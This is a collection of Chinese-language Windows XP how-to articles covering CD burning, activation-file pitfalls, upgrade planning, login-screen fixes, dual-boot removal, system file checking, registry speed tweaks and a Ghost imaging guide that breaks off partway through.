    吸收、集成别人的优秀技术一直是Windows的一个特点。光盘刻录功能也不例外。 Windows XP的刻录引擎采用的是Roxio公司的刻录技术。提起Roxio，大家可能会感觉有些陌生。但是如果说到著名的Easy CD Creator，相信多数刻录机用户都不会对它感觉陌生。Roxio就是Easy CD Creator的开发商。Windows XP只是提供了最基本的刻录功能。

    当刻录机被Windows XP正确识别后，在“我的电脑”的 “有可移动存储的设备”中会出现和光驱一样的图标，Windows XP会将它识别为“CD驱动器”。选中它的图标，点鼠标右键，选“属性”，点“录制”进行刻录属性设置(如图1)。

图1

    选中“在这个设备上启用 CD 录制”就可以启动光盘刻录功能了。这样，当我们在不同情况下打开右键菜单时，都会有相应的刻录选项，比如“将这些文件写入CD”(如图2)。如果你安装了第三方刻录软件，如Easy CD Creator，将会看不到这些选项。

图2

    在Windows XP下刻录数据光盘是先把要刻录的文件复制到存放镜像的驱动器上，制作成镜像再刻录的。存放镜像文件的驱动器是可以选择的，放“镜像”的驱动器默认的是Windows XP系统所在的驱动器。如果你将其转换为NTFS格式，可以提高刻录时的速度。要注意的是，因为Windows XP刻录前需要制作镜像文件，所以要保留至少1GB的空间。这个过程看似复杂，其实我们只要通过“复制-粘贴”，拖放文件或选定文件后添加的方式把要刻录的文件加进刻录列表就行了。

    刻录速度可以自己选择，从最慢的1x刻录到刻录机支持的最高速度均可。不过，要注意查看CD-R/RW盘所支持的刻录速度，以免造成损失。

    “写入完成后是否自动弹出CD”就看个人的使用习惯了。

    另外，Windows XP使用多区段方式进行刻录，我们可以不断添加数据，只要光盘容量允许。不过，这种方式刻录多区段光盘不能使用其他刻录软件继续添加数据。

    惊天Bug揭秘

    一、 问题的发现

    前段时间，日本微软在技术支持信息中宣布，使用Windows XP自带的光盘刻录功能向CD-R/RW盘进行写入操作时会出现丢失文件、文件夹或光盘不可读取的现象。当写入CD-R/RW光盘中的文件或文件夹是以“医”字开头时，如果再追加记录数据则有可能造成文件丢失。根据微软的技术说明文件，仅在利用Windows XP自带的刻录上对CD-R/RW写入时才会发生。Windows XP Home Edition(家用版)和Professional(专业版)都存在这个问题。

    二、 问题验证

    我们使用的是Windows XP Professional版，刻录机为明基(Benq)2010A(写数据传输率：20x，重写数据传输率：10x，读数据传输率：40x)。

    测试过程：

    1、 先刻录一个Ricky Martin的文件夹，内有27个文件，共114MB。刻录成功，在Windows 98/XP下读取正常。

    2、 再添加一个“医学测试”的文件夹，内有2个MP3文件，共6MB。刻录成功，在刻录机上读取成功。在普通光驱上，文件夹丢失。

    3、 再次添加数据，刻录名为“New”的文件夹，内有4个文件，提示刻录成功。结果发现，在刻录机上读取时，所有文件夹都不见了。在光驱上，只能见到并读取Ricky Martin文件夹了。

    可以看到，Windows XP刻录功能确实存在Bug。

    三、解决办法

    需要注意，不要向CD-R/RW光盘写入以“医”字开头的文件或文件夹以及不在包含这一类文件的CD-R/RW光盘中追加记录数据等。

图3

    还有一个方法是运行Windows Update，选用“Windows CD烧盘机更新”可以解决这个问题。重新启动计算机以完成安装过程。经过验证，果然没有再出现问题。

    与第三方软件的兼容性

    可以看到，Windows XP的刻录功能很有限，如果要刻录可引导光盘、VCD等，必须要借助于第三方软件。这就引出了一个新问题：Windows XP与第三方软件的兼容性如何呢？

    一、Easy CD Creator

    Windows XP不支持Easy CD Creator 3.x/4.x版。Easy CD Creator 5.0x Basic/Platinum版可以通过在Roxio公司的网站(www.roxio.com)下载免费补丁程序的方法来解决问题。Windows XP可以较好地支持Easy CD Creator 5.1 Basic/Platinum版。另外，还可以从Roxio网站下载Easy CD Creator 5.1 Basic的90天免费试用版。

    二、Nero

    从Nero 5.5.5.1版开始，Nero就可以在Windows XP下稳定运行了。目前Nero的最新版是5.5.6.4版。

    刻录功能的支持

    目前Windows XP还没有支持防刻死技术的选项，所以对于一些需要软件配合的防刻死技术，就无法支持了，必须安装第三方刻录软件。对于CD的刻录在Windows XP下非常方便，只需要在Media Player中选中文件刻录到CD就好了，不过大家要注意只能对WMA和WAV文件进行转换，MP3是无法进行的。对于CD+数据的刻录方式恐怕就需要进行手工刻录了，先刻入数据或者CD音轨再加入剩下的数据。如果您要刻录启动盘，目前系统还无法支持，必须使用第三方刻录软件。


慎用还原Wpa.dbl文件来达到使WindowsXP永远激活的目的

《一键清理系统垃圾》

慎用还原Wpa.dbl文件来达到使WindowsXP永远激活的目的

WinXP新增的激活功能很是讨厌。我想没有人会反对这个观点的。于是就有人提出备份WindowsXP的激活文件来达到永远激活WinXP的目的而不需要重新上网/打电话激活了。接着就有人说明了这个文件就是Wpa.dbl,没错，WindowsXP就是这个验证这个文件来确定你的WindowsXP是否需要激活/重新激活。但是经过我的一番实践，发现这个方法有欠妥之处。
前几日，我的WindowsXP发生问题，导致系统误认为我的硬件系统发生变化，导致我的WindowsXP需要重新激活，并且锁定了我的正常登陆模式，并且提示你的WindowsXP需要重新激活，可事实上我的硬件系统没有发生任何变化，并没有添加/删除任何硬件设备，也没有更新BIOS/固件，可是WindowsXP还是认为我的WindowsXP需要重新激活，没有办法，我找上面提到的方法在win98下（我的机子装有3个系统，分别是Win98/2000/XP）把WPA.DBL文件还原到原位置并且覆盖了源文件，重新启动到WindowsXP以后发现系统果然已经激活了，一阵喜悦之情马上溢于言表。但是当我想看看系统属性的时候，发现提示有一个用于提供系统属性信息的服务没有启动，我马上到控制面板/管理工具/服务里面察看是否没有启动，经过检查，发行服务并非系统提示中说的那样没有启动，而是正在正常的运行。随后我在命令窗口模式中输入systeminfo，结果遭到拒绝。我感到很奇怪，于是到系统日志中察看，最终发现硬件数据库被毁坏了。结果导致不能使用系统信息工具。而且那个硬件设备数据库我没有备份，我想这可遭了。虽然系统基本上没有问题，但是不知道系统的稳定性如何，因为硬件数据库的被破坏的后果最终会导致系统不认识我的硬件设备/错误的认识。还好我前一天在系统完全正常的情况下（也无需激活）使用了系统还原工具做了一个备份，于是我启动系统还原工具，结果发现我的系统还原备份点全部被删除了！后果当然是不能使用系统还原功能。

这么办？重新安装？不！我想到了还有之后一招：是用修复WindowsXP的功能。说起这个修复WindwsXP，这可是一个很好用的方法：修复就相当于Windows98的覆盖安装一样，不但可以保留所有软件，而且还可以保留所有的设置，是一个修复系统的很好的方法。

因为使用上比较复杂，所以我画了使用流程图如下：

使用WindowsXP启动以后
----------------------
|
|
F6-->安装额外的SCSI/RAID驱动
|
|
F2-->使用Windows Automated System Recovery Disk(ASR)修复系统（最佳选择，不过事先要制作ASR软盘）
|
|
安装WindowsXP 按ENTER键
故障控制台修复WindowsXP 按R键-------〉会启动故障控制台（适用于高级用户）
放弃安装 按F3
|
|
<按ENTER键>
|
|
同意安装协议
|
|
自动搜索老版本的Windows(不能搜索NTFS文件系统)
|
|
搜索完成以后会提示搜索到的Windows，不会有Win98，移动光标到要修复的Windows操作系统上
|
|
修复安装WindowsXP 按R键--------〉会自动启动安装界面并且开始安装，耗时和全新安装差不多，安装结束前会要求填入CD-KEY，全部结束以后就可以启动到WindowsXP下了，并且已经安装的软件和个人信息不会丢失，但是还是有些问题（见后面）
全新安装 按F8键-------〉会按照全新安装模式安装系统。

我选择了修复安装WindowsXP以后，系统开始安装了，经过漫长的45钟以后，安装结束，登录进WindowsXP以后，发现果然可以使用系统信息了，而且硬件设备数据库也修复了，系统仍然处于无需激活状态，但是接着发现好像还是有些问题没有解决：
1.以前安装的所有补丁全部丢失，需要重新安装。
2.显卡驱动程序被更换成WindowsXP自带的，想必是我的显卡驱动没有数字签名。
3.Intel应用程序加速器软件丢失，需要重新安装。
4.systeminfo不能够全部反映出整个系统的信息。以前能够显示的启动了多少时间的，修复后不能够显示，以前能够显示的已经安装了多少个补丁修复以后只能够显示几个（即使全部补丁安装完毕也是这样）。

虽然我的系统已经修复，但是没解决的问题仍然存在，如果大家知道解决方法（就是问题4的解决方法），请来信告知。

修复注意事项：
1.必须使用上次安装的CD，不然即使修复成功也不能够登录。
2.要求立即激活的系统修复以后仍然要求立即激活。
3.关于锁定：这里有些误解会认为磁盘被锁定了，数据会丢失了，这些全是谎话，真实的情况是不能够登录到正常模式下，但是安全模式下仍然可以使用，而且磁盘也没有问题。也可以使用DOS操作或故障控制台的操作，如果安装有其他的操作系统，也可以操作。
4.关于被锁定以后硬盘损坏：这个完全是有人恶意造谣的问题。
5.关于逻辑炸弹：所谓的逻辑炸弹就是在一定条件下发生作用的一个程序，比如KV的江民炸弹。但是请大家注意：在一定条件下发生作用的程序不一定是逻辑炸弹，比如共享软件的试用期和WindowsXP的试用期等等。这些程序在没有注册/激活的情况下都有一定的条件限制，但是一旦经过注册/激活以后，这个条件限制就自动解除了。并不存在WindowsXP超过使用期限没有激活就会导致硬盘损坏的谣言。
6.关于激活：没有激活前可以使用30天，如果已经激活，但是硬件改变量超过5件，仍然需要重新激活（硬件改变量指有改变的硬件设备。注意有的硬件改变以后，其改变量会被认作是2或更高，如网络设备）。安装虚拟光驱软件也会被认作是硬件发生改变，升级BIOS/固件，修改IDE设备的主从关系也会被认作系统硬件发生改变，这里需要大家格外注意。
7.正版用户的激活限制：一般来说是5次，但是只要你超过5次以后打免费电话到微软（中国）激活中心说明情况以后，他们会把数据库的记录清零，也就是说没有激活次数的限制。


升级到Windows XP应该考虑的6个方面

《一键清理系统垃圾》

升级到Windows XP应该考虑的6个方面

微软去年10月份推出的Windows XP不但在功能上有很大改进，而且在安全性方面也有较大提高，当然了，微软在添加新功能方面一向比在提高安全性方面做得好。尽管目前仍然有与Windows 2000相比，Windows XP的速度是提高了还是降低了的争论，但毫无疑问的是，Windows XP中功能的变化足以使我们不能简单地把它认为它与Windows 2000差不多。

    无论使用的是Windows、Linux、BSD或其他的什么系统，只要是系统管理员，就需要认真地对待网络中Windows XP机器的管理问题。下面是在从以前版本的Windows向Windows XP升级时，系统管理员需要认真考虑的Windows XP中一些最重要的元素。

    1、评估和计划

    尽管Windows XP是基于Windows 2000的，但不要以为它是另一个版本的Windows 2000，必须对下面的因素进行认真的评估：

    ·企业组织和地理上的要求。
    ·应用程序的要求。（包括软、硬件要求）
    ·现有的Windows NT域架构，例如域的数量和有效的系统策略。
    ·服务器的服务包和补丁程序。
    ·互操作性。
    ·当前以及将来的网络和应用程序标准。
    ·用户类型（漫游、移动、远程、基于任务、基于知识的等）。
    ·软件标准。
    ·硬件标准。
    ·支持问题。
    ·命名习惯。
    ·安全策略。

    我们还需要考虑硬件和软件的兼容性问题。运行Windows XP，对硬件的要求就会有所提高。在Windows XP中有一个软件分析工具对所有安装的应用程序进行检查，看是否存在问题。

    如果不能确定你的系统是否能够运行Windows XP，有一个方法可以在无需进行安装的情况下对系统进行评估，Windows XP专业版中有一种被称作“只检查升级”的模式，它可以用来对升级过程进行测试。

    “只检查升级”模式能够产生一份在实际升级过程可能会出现问题的清单，例如硬件兼容性问题或在升级中不能移植的软件等。要在“只检查升级”模式中运行Setup程序，可以以命令行方式运行i386文件夹中的Winnt32.exe程序，并带上-checkupgradeonly参数，它将对MS-DOS配置、即插即用的硬件和安装的软件进行检查。
  2、至少要了解Windows 2000

    如果熟悉Windows 2000，管理Windows XP就会简单许多。Windows XP是以Windows 2000为基础的，因此，如果熟悉Windows 2000的管理，升级就会比只熟悉Windows NT 4.0 Server要顺利得多。微软的一位Windows XP产品经理曾表示，在Windows 2000的管理中积累的经验也适用于Windows XP。

    Windows XP中所有的新功能都可以通过策略进行控制。Windows XP中的远程安装、Active Desktop、 Intellimirror等工具与Windows 2000中基本上是相同的，但Windows NT 4.0的系统管理员就需要学习这些新工具的使用方法。

    微软提供了用户状态移植工具（USMT），这款工具旨在帮助系统管理员大规模地布署运行专业版的Windows XP系统，它可以向Windows XP中传输Windows 9x或Windows 2000桌面的个性化设置。

    可以将Windows NT 4.0的域移植到Windows 2000/XP的域中，象以前那样进行映射。但微软指出，在大多数情况下，系统管理员应该花点时间学习使用活动目录技术，从一开始就使用一个全新的域。

    活动目录功能也有所改进，但改进主要是在灵活性方面的。例如，如果为台式机准备了一个Windows XP的映像，其中的一些台式机需要不同的驱动程序，该映像就知道应该使用哪些驱动程序。在Windows 2000中，如果要更换一个驱动程序，就需要重新制作一个新的映像。

    3、应用程序的要求和改变

    如果运行Windows NT 4.0的系统很多，那就要需要多花些时间来考虑你的应用程序是否能够在Windows XP中运行这个问题了。能够在专业版Windows 2000上运行的应用程序在Windows XP上运行一般不会有什么问题，因为除一些低层次应用程序外，Windows 2000的应用程序都能够在Windows XP上运行。

    其中最大的问题是调用操作系统内核或与架构有关的函数的低层应用程序。Windows NT 4.0和Windows 2000的内核之间的变化就使得一些Windows NT 4.0的一些应用程序不能在Windows 2000上运行。如果应用程序是调用API的，则一般不会有什么问题。

下面的Windows NT 4.0应用程序在Windows XP中运行会出现问题：

    ·依赖文件系统筛选程序的应用程序，例如反病毒软件、磁盘工具和磁盘限额软件。
    ·客户的电源管理方案和工具， 专业版Windows XP支持ACPI和APM，可以取代这些工具，在升级前删除这些工具。
    ·客户的即插即用解决方案。这些方案已经不再需要了，因为专业版Windows XP提供了对即插即用的完全支持，在升级前应当删除客户的即插即用解决方案。
    ·容错解决方案，例如磁盘镜像等。
    ·其他网络客户端和服务。
    ·病毒扫描工具。
    ·UPS

    微软有一个被称作“升级顾问”的工具，可以对安装的应用程序和硬件进行检查。在进行这项检查时，会对兼容性数据库进行升级。用户可以从微软的网站上下载这一工具。

    如果一个应用程序不能在Windows XP中运行，“软件兼容性向导”将试图使用不同的操作系统模式运行这一应用软件。右击一个应用程序，并在出现的菜单上选择“属性”，就会出现一个“兼容性”标签。在Windows XP 中不能运行或不能很好地运行的应用程序可以在下面的一些模式中运行：

    ·Windows 95.
    ·Windows NT 4.0 (Service Pack 5).
    ·Windows 98/Windows Me.
    ·Windows 2000.

    4、硬件支持

    如果希望操作系统能够在配置64M内存的计算机上运行，那最好考虑免费的操作系统，因为Windows XP需要大量的内存。它的最低要求是64M内存，如果要使运行Windows XP的计算机能够使用，则最低需要128M，建议配置256M或更多的内存。

    至于其他的硬件配置方面，应该确保计算机的BIOS与专业版Windows XP兼容，尤其重要的是它必须支持ACPI，因为在安装Windows XP时会用到这一功能。微软有一个Windows XP兼容硬件列表，而且还在对它不断地进行更新。

尽管许多硬件厂商都推出了针对Windows XP的驱动程序，但在大多数情况下，Windows 2000的驱动程序可以很好地在Windows XP中运行，但建议用户不要在Windows XP中运行Windows 9x的驱动程序。Windows Me、Windows 95、Windows 98和Windows 3.x中的16位的驱动程序是基于虚拟设备驱动程序（VxD）模式的，Windows XP不支持VxD模式。

    从Windows 9x向Windows XP升级时，16位的驱动程序不会被移植到新的系统上，因此，必须准备好Windows 2000/XP的驱动程序。在安装过程中可以选择在安装结束后再安装驱动程序。

    具有数字签名的驱动程序首次出现在Windows 2000，这一功能在Windows XP中得到了全面的应用。如果在Windows XP中安装没有数字签名的驱动程序，就会收到一个对话，警告用户这一驱动程序没有得到微软认证。在Windows XP中，我们可以禁止这一对话框的出现，也可以禁止在系统上安装没有数字签名的驱动程序。

    Windows XP还支持驱动程序反转和系统恢复功能。驱动程序反转功能可以将安装的驱动程序恢复为以前安装的版本，系统恢复功能可以将应用程序的设置恢复到上一次的状态或以前一个时间的状态。

    5、留意新的功能

    Windows XP中引入了一些新的功能，我们需要牢记这些新功能。它们是无线支持、远程桌面、远程帮助和Windows Messenger即时通讯。

    无线支持主要通过零配置的802.11x网络功能体现出来。Windows XP能够自动地将计算机连接到网络上，而无需进行手动配置。
远程桌面功能使得我们能够远程访问自己的PC机，这一功能与赛门铁克公司的pcANYWHERE工具相似，但不如pcANYWHERE功能更全面。它使用了Windows 2000的安全模式，安全性是通过VPN网络处理的。在安装Windows XP时，这一功能在缺省状态下是关闭的，在需要时系统管理员可以打开它。

    就象它的名字提示的那样，远程帮助功能能够使技术支持人员无需到现场，就可以发现PC机中的故障并加以解决。系统管理员需要决定通过远程方式提供的支持水平，以及如何进行支持，例如是通过即时通讯还是电话，还必须决定支持是自动完成的还是人工完成的。

    Windows XP中的MSN Messenger有了很大的改进，它集成了原来的MSN Messenger和NetMeeting的功能，并提高了性能。它是一种无需NetMeeting服务器的P2P工具，在使用和设置方面更简单，可以与更多的应用程序一块运行。

    6、现代化的界面

    新的界面不但使Windows XP更美观，而且还改变了一些影响如何使用计算机的功能。

    尽管是为家庭用户设计的，商业用户也可以很好地使用快速用户转换功能。它能够使多个用户共享一台计算机，而使各自的数据和应用程序彻底分隔起来。如果另外的用户要使用计算机，当前的用户无需保存打开的文件和从系统中注销。Windows XP利用终端服务技术以终端服务对话的方式运行每一个对话，使每个用户的对话被完全分离开。

    重新设计的“开始”按钮能够使我们看到最频繁使用的文件和应用程序，方便我们的访问。此外，上面还有“帮助和支持”选项。

    文件的管理也得到了改变。“我的文档”可以使用户按组或修改的时间对文件进行管理。此外，窗口左部的Webview选项提供了一些可以执行的操作，例如，重命名、删除、放到网络上等，这些功能以前都需要多次选择菜单才能使用。


手工恢复Windows XP的欢迎登录界面

《一键清理系统垃圾》

手工恢复Windows XP的欢迎登录界面

    2002-01-28　　　　 作者：

日前在网络上看到有朋友在用户帐户里面取消欢迎登录模式以后就不能够恢复了，我考虑了很久也没有发现问题的所在，当然也没有发现解决问题的途径，但是现在我终于发现了这个问题的所在，这是因为WinXP的组策略编辑器里面启用了一个选择----“总是用传统登陆”（如图1）,熟悉NT的朋友们都知道，组策略的优先比一般的修改要高，所以当我们在用户帐户里面选择使用WinXP的欢迎登陆模式时，由于组策略的优先级比一般的系统设置的优先级要高，所以设置会无效。那么WinXP为什么会自动的在组策略里面启用“总是用传统登陆”呢？我猜测这应该就是一个BUG，因为仔细分析组策略以后会发现有很多的设置可以通过系统的设置完成，而且完成以后并不会反映在组策略里面，只有取消使用WinXP的欢迎登陆界面蔡反映在了组策略里面，恢复WinXP的欢迎登陆界面的方法很简单，在运行中输入“gpedit.msc”,打开组策略，找到图1所示的地方（即依次选择计算机配置--管理模板--系统--登录）,然后用鼠标左键双击“总是用传统登陆”，会弹出一个对话框，选中“未配置”或“已仅用”以后按下确定（如图2），然后察看剩下的有关是否使用欢迎界面的组策略--“登陆时不显示欢迎屏幕”是否为“已启用”，如果是的话修改为“未配置”或“已禁用”，最后到控制面板--用户帐户里面--更改用户登陆或注销方式里面察看是否选中使用欢迎界面，没有的话选中即可恢复WinXP的欢迎登陆界面。

需要注意的地方，这样修改以后，以后即使再次取消使用欢迎屏幕也可以在控制面板--用户帐户里面恢复而不需要到组策略里面修改了。这就是我认为这是WinXP的一个BUG的原因。

遗憾的是微软到现在仍然没有对此做出任何表示，包括在他的知识库里面也没有相关的解决方案。

最后希望本文能够解决大家的问题。


双剑合璧 在Win XP下刻录音乐CD

《一键清理系统垃圾》

双剑合璧 在Win XP下刻录音乐CD

2002-01-17　　　　作者：

    为了能在CD机上播放自己喜爱的MP3，我们都是靠一些转换软件将MP3转换成WAV后再刻录成CD盘的。Windows XP能很方便地刻录数据光盘。那它能不能刻录CD盘呢？

    答案是肯定的！Windows XP自带了Windows Media Player 8.0，它不仅能播放绝大部分的音频文件，通过与Windows XP刻录功能的结合，还能将WMA、MP3、WAV这三种音频文件直接转换并刻录成CD，真可谓是双剑合璧，威力无穷啊！

    准备

    将一张空白的刻录盘插入刻录机中。如果是可擦写的CD-RW盘，一定要先将上面的数据全部擦除，然后再使用。

    选择待刻文件

图1

    打开“我的电脑”，选中你打算刻录成CD的音频文件(必须是上面提到的那几种格式的文件)，点击窗口左侧任务栏上的“复制到音频CD”，如图1。此时系统会自动运行Windows Media Player 8.0。

图2

    在Windows Media Player 8.0主界面的“要复制的音乐窗口”中列出了刚才选中的那些音频文件，包括文件名、长度、体积等，在该窗口的下方则显示了所选歌曲的数目及刻录成CD后所占用的时间长度。在右边的窗口中你可以看到一个重要的信息——刻录盘支持的时间长度。那么上面提到了两个“时长”有什么意义呢？我们知道，同样一首歌采用不同比特率压缩后，其文件大小是不一样的。在制作CD时，我们一般不根据音频文件体积的大小来确定一张刻录盘刻录多少首歌，而是通过刻录软件获知所刻音频文件所需时长及刻录盘支持的时长来确定(一般一张650MB的刻录盘能装74分钟长的CD)。如果已选文件超长，可通过音频文件前面的复选框，删除一些歌曲，来满足刻录盘的容量要求，如图2。

    高级设置

    点击Windows Media Player 8.0主界面上的工具栏菜单，选择“选项”，点击“复制音乐”标签。在下面的“复制设置”中，一定要记得去掉“保护内容”前复选框中的勾，否则制作出来的CD只能在制作该CD的电脑上播放，不能在其他设备上使用，切记！至于下面的音乐质量设置，采用默认值即可，如图3。

图3

    点击“设备”标签，双击刻录机盘符进入其属性设置窗口后点击“音频”标签，选中“复制”栏中“数字”和“使用错误修正”，最后保存退出，如图4。

图4

    注意：虽然启用“数字”复制和“使用错误修正”能避免复制过程中产生的错误(以免制作出来的CD在播放时出现爆音现象)，但能否使用“数字复制”还得看你的刻录机是否支持，不然的话还是选择“模拟复制”吧。

    刻录CD

    所有设置完成后回到Windows Media Player 8.0主界面，然后点击“复制音乐”开始刻录(如图3)。在开始刻录前程序会先将选中的音频文件进行检查并转换，最后才会刻录到光盘中。

    注意：前面在刻录数据光盘时曾说Windows XP采用多区段方式刻录光盘，很有可能有人会将此“高招”用到刻录CD上来，在此严重声明——制作CD不能使用此方法！哪怕你一张光盘上只刻录了一首歌，以后也不能再添加文件了。为了不浪费刻录盘，请大家在刻录CD之前最好能“凑齐”一张光盘的歌曲。

    怎么样，用Windows XP刻录音乐CD是不是很简单？你学会了吗？我们下期再见吧！


双系统中安全删除XP系统

《一键清理系统垃圾》

双系统中安全删除XP系统

    我们找到正确删除双引导系统中XP的方法，在此提供给大家作参考。

    1、首先，要利用Win98的引导软盘来启动电脑，进入DOS工作模式。

    2、在DOS模式下键入“FDISK/MBR”命令行，并敲回车。

    3、在DOS模式下键入“SYS C:”，并敲回车键执行。此命令将A盘的Win98操作系统引导文件传输到C盘根目录下。

    4、重新启动电脑，将出现Win98的操作界面，最后在C:\根目录中将以下几个文件删除：

    Pagefile.sys

    Boot.ini

    Ntldr

    Ntdetect.com

    Ntbootdd.sys(可能不存在)

    这时，你可以放心大胆地将XP操作系统所在硬盘分区格式化了。

    5、注意事项：此方法只适用于WinXP和Win98分别安装在不同硬盘分区，而且XP分区不能是主活动分区(Primary Active Partition)。


谈Win XP中的另一位还原专家

《一键清理系统垃圾》

谈Win XP中的另一位还原专家

    在Windows中Sfc.exe(系统文件检查器)是用来验证系统文件完整性并修复系统文件的实用工具。在Windows XP中，它的功能更为强大：我们也可以用这个工具来实现还原的功能，Windows XP中“系统文件检查器”可以扫描所有受保护的系统文件以验证其版本，也可以设置文件缓存大小、清除文件缓存及重新填充“%SystemRoot%＼System32＼Dllcache”文件夹。

    在Windows XP中启用“系统文件检查器”，先要运行“命令提示符”：单击“开始→所有程序→附件→命令提示符”，或是单击“开始→运行”命令，在命令行中键入“cmd”并按下回车键。然后在“命令提示符”窗口的光标提示符后键入“Sfc”并按下回车键，会给出如下图1所示的提示。

图1

    比如我们键入“Sfc/SCANNOW”，按下回车键后，“系统文件检查器”就会开始检查当前的系统文件是否有损坏、版本是否正确，如果发现错误，程序会要求你插入Windows XP安装光盘来修复或者替换不正确的文件。如果Dllcache文件夹被破坏或者不可用，你还可以使用“Sfc/scanonce”或“Sfc/scanboot”命令修复该文件夹的内容以保证系统的安全性和稳定性。


提升XP运行速度 100%

《一键清理系统垃圾》

提升XP运行速度 100%

    在使用XP的过过程中，系统运行速度会随着时间的推移越来越慢了，有的朋友可能会想到重装系统，但重装后，那么多的应用软件也要重新安装，如何在不安装系统的前提下提升XP的运行速度呢？只要你安照以下九个方面操作，相信你的XP又会重新高速运行。

1、加快开关机速度

    在Windows XP中关机时，系统会发送消息到运行程序和远程服务器，告诉它们系统要关闭，并等待接到回应后系统才开始关机。加快开机速度，可以先设置自动结束任务，首先找到HKEY_CURRENT_USERControl PanelDesktop，把AutoEndTasks的键值设置为1；然后在该分支下有个“HungAppTimeout”，把它的值改为“4000(或更少)，默认为50000；最后再找到HKEY_LOCAL_MACHINESystemCurrentControlSetControl，同样把WaitToKillServiceTimeout设置为“4000”；通过这样设置关机速度明显快了不少。

2、提高宽带速度

    专业版的Windows XP默认保留了20%的带宽，其实这对于我们个人用户来说是没有什么作用的。尤其让它闲着还不如充分地利用起来。

    在“开始→运行”中输入gpedit.msc，打开组策略编辑器。找到“计算机配置→管理模板→网络→QoS数据包调度程序”，选择右边的“限制可保留带宽”，选择“属性”打开限制可保留带宽属性对话框，选择“启用”，并将原来的“20”改为“0”，这样就释放了保留的带宽。

3、优化网上邻居

    Windows XP网上邻居在使用时系统会搜索自己的共享目录和可作为网络共享的打印机以及计划任务中和网络相关的计划任务，然后才显示出来，这样速度显然会慢的很多。这些功能对我们没多大用的话,可以将其删除。在注册表编辑器中找到HKEY_LOCAL_MACHINEsofewareMicrosoftWindowsCurrent VersionExploreRemoteComputerNameSpace，删除其下的(打印机)和{D6277990-4C6A-11CF8D87- 00AA0060F5BF}(计划任务)，重新启动电脑，再次访问网上邻居，你会发现快了很多。

4、加快启动速度

    要加快Windows XP的启动速度。可以通过修改注册表来达到目的,在注册表编辑器，找到HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory ManagementPrefetchParameters，在右边找到EnablePrefetcher主键，把它的默认值3改为1，这样滚动条滚动的时间就会减少；

5、自动关闭停止响应程序

    有些时候，XP会提示你某某程序停止响应，很烦，通过修改注册表我们可以让其自行关闭，在HKEY_CURRENT_USERControl PanelDesktop中将字符健值是AutoEndTasks的数值数据更改为1，重新注销或启动即可。

6、加快菜单显示速度

    为了加快菜单的显示速度，我们可以按照以下方法进行设置：我们可以在HKEY_CURRENT_USERControl PanelDesktop下找到“MenuShowDelay”主键，把它的值改为“0”就可以达到加快菜单显示速度的效果。

7、清除内存中不被使用的DLL文件

    在注册表的HKKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion，在Explorer增加一个项AlwaysUnloadDLL，默认值设为1。注：如由默认值设定为0则代表停用此功能。

8、加快预读能力改善开机速度

    Windows XP预读设定可提高系统速度，加快开机速度。按照下面的方法进行修改可进一步善用CPU的效率：HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSessionManagerMemoryManagement]，在PrefetchParameters右边窗口，将EnablePrefetcher的数值数据如下更改，如使用PIII 800MHz CPU以上的建议将数值数据更改为4或5，否则建议保留数值数据为默认值即3。

9、减少启动时加载项目

    许多应用程序在安装时都会自作主张添加至系统启动组，每次启动系统都会自动运行，这不仅延长了启动时间，而且启动完成后系统资源已经被消耗掉！

    启动“系统配置实用程序”，在“启动”项中列出了系统启动时加载的项目及来源，仔细查看你是否需要它自动加载，否则清除项目前的复选框，加载的项目愈少，启动的速度自然愈快。此项需要重新启动方能生效。

阿涛注：

方法2经试验，并不能实际改善下载速度。XP应该有自动控制带宽的功能。在1M ADSL的带宽下，直接用IE的下载功能，速度基本在100-106K左右。不论是否修改该值。

方法4不可取。EnablePrefetcher实际上是预读取功能，如改成3，总体的启动时间会加长。仅会让滚动条减少滚动次数。 参见方法8。


万能WinXP Ghost镜像制作指南

《一键清理系统垃圾》

万能WinXP Ghost镜像制作指南

    重装系统可不是一件好玩的事情：首先得端坐在电脑桌前老老实实地回答windows安装程序提出的问题，安装好了呢，也不能闲着，还得安装驱动程序、应用程序……粗略佑计，没有半天拿不下来！可能有朋友会说，用Ghost，既快又方便，不出五分钟，系统就恢复了，不过那只是本机备份，如果拿到别人的机器上去恢复，肯定会“水土不服”，道理很简单：硬件、系统、网络的配置不可能都千篇一律……不过看完本文以后，你就可以轻松打造出一把万能钥匙了，随便什么机器，都可以轻松采用Ghost恢复安装的方法，10多分钟就能搞Windows XP的安装！

  一、做好准备工作

    安装好Windows XP并且利用Windows Update升级最新的系统补丁（包括service Pack l和其他最新的Hot fix）。同时安装好所需的应用程序，不过不要贪多，因为将应用程序安装在 C 盘里并不是值得推荐的做法，同时会造成Ghost映像文件的容量过大。

    二、为Windows XP减肥

    不管是否需要将最后产生的Ghost映像文件刻录到光盘上，都应该对Windows XP进行减肥，以尽可能地减小Ghost映像文件的容量。可以删减的主要项目如下：

    1．系统文件保护缓存

    它位于C:\WINDOWS\System32\Dllcache目录下，我们只需在命令提示符窗口中运行“sfe . exe/purgecache”即可将它删除。

    2．清空页面文件

    在“我的电脑”上单击鼠标右键，选择“属性”。在打开的“系统属性”对话框中选择“高级”选项卡，单击“性能”下的“设置”按钮，在打开的“性能选项”对话框中选择“高级”选项卡，再单击右下角的“更改”按钮，打开“虚拟内存”对话框。默认情况下虚拟内存文件保存在Windows XP的安装目录下，我们只需选择下面的“无分页文件”选项，再单击“设置”按钮即可。重新启动计算机后虚拟内存文件即被删除。注意做好硬盘映像文件后，再重设虚拟内存。

    3．关闭系统还原功能

    在打开的“系统属性”对话框中选择“系统还原”选项卡，选中“在所有驱动器上关闭系统还原”前的复选框即可。

    4．其他方法

    我们还可以采用其他的如删除帮助文档、删除不需要的输人法、字体文件等常规“减肥”方法来进一步减小Windows XP所在分区的大小。
    三、对驱动程序做手术

    由于我们要制作的是一个万能的Windows XP Ghost文件，目标计算机上的硬件配置和当前计算机的配置肯定不完全相同，因此我们要将当前计算机上的设备驱动程序删除。

    1. 删除普通驱动程序

    ① 在“运行”对话框里输人“devmgrnt.rnsc”并回车，打开“设备管理器”控制台窗口。

    ② 找到网络适配器，鼠标右键单击其下的网卡设备名称，在弹出菜单上单击“卸载”菜单项。

    ③ 再用类似的方法卸载通用串行总线控制器、视频游戏控制器、显卡、声卡等设备驱动程序。这里要注意的是，如果系统提示需要重新启动，一定不要重启机器，以免系统自作主张，重新安装驱动程序。

    2. 更新ACPI属性

